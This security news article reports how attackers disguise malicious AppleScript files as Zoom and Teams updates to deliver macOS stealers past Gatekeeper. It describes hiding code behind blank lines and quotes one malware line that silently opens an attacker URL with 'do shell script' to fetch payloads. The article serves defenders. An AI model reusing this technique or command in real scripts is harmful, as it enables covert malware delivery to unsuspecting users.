Hackers are increasingly weaponizing AppleScript files to deliver macOS malware, masquerading as legitimate software updates for popular applications like Zoom and Microsoft Teams. This sophisticated new tactic emerged following Apple’s August 2024 patch that removed the “right-click and open” Gatekeeper override, forcing attackers to find alternative methods to bypass macOS security controls.
Security researchers have identified these malicious .scpt files, which by default open in the Script Editor application, presenting a deceptive user interface. Attackers exploit this by embedding malicious code after numerous blank lines, obscuring the true payload from casual inspection. Users who are tricked into clicking “Run” or pressing Cmd+R inadvertently execute the script, even if it has been flagged by Gatekeeper’s quarantine protections, effectively circumventing Apple’s built-in security measures.
AppleScript Weaponized for macOS Malware Delivery
This emerging threat vector, detailed by security analysts at Moonlock Labs and Pepe Berba, marks a significant evolution in macOS attack methodologies. While AppleScript files have been used in previous attacks, the recent proliferation of this particular technique, especially by common malware families like MacSync Stealer and Odyssey Stealer, is a cause for concern. This trend indicates a classic pattern where advanced techniques, once employed by sophisticated state-sponsored actors, are now trickling down to broader criminal operations targeting a wider user base.
The deception employed by these threat actors is multi-layered. Firstly, the filenames are crafted to mimic legitimate software updates. Examples include “MSTeamsUpdate.scpt,” “Zoom SDK Update.scpt,” and “Microsoft.TeamsSDK.scpt.” When opened, the Script Editor presents a seemingly innocuous interface with social engineering prompts designed to encourage the user to execute the script. The actual malicious code is hidden, making it difficult for the average user to detect.
Additionally, the underlying AppleScript code is designed to execute commands that appear mundane or relevant to software updates. A technical analysis revealed code snippets that, when executed, use the `do shell script` command to open malicious URLs in the background. For instance, a command might look like `do shell script “open -g ” & quoted form of teamsSDKURL`, where `teamsSDKURL` points to a malicious web address. This allows attackers to download and install further payloads stealthily while the user is presented with a fake update process.
The effectiveness of this technique is further amplified by its ability to evade current security measures. Many of these .scpt files currently show zero detections on VirusTotal, providing attackers with a significant window of opportunity before security vendors can develop and deploy detection signatures. This lack of immediate detection allows the malware to spread more widely and establish persistence on victim systems.
Circumventing Gatekeeper and User Trust
The primary method of distribution for these malicious AppleScript files is through phishing emails and compromised websites that offer seemingly legitimate software updates. Attackers prey on users who are actively seeking to update their applications, making them more susceptible to clicking on malicious links or downloading compromised files. This attack vector exploits user trust in familiar application names and the inherent reliance on native system tools that legitimate users interact with daily.
The bypassing of Gatekeeper is a critical aspect of this attack. Traditionally, Gatekeeper prevented users from opening downloaded applications from unidentified developers. However, by using compiled AppleScript files that can be executed directly, attackers are sidestepping these checks. The user’s action of clicking “Run” within the Script Editor effectively overrides the quarantine flag, allowing the malicious script to execute its payload.
Looking ahead, organizations must focus on educating their users about the importance of verifying software updates through official channels only. Furthermore, implementing robust endpoint detection and response (EDR) solutions capable of monitoring AppleScript execution patterns and command-line activity will be crucial. The evolving nature of these attacks suggests that continuous vigilance and adaptation of security strategies will be paramount in protecting macOS environments from sophisticated malware delivery techniques.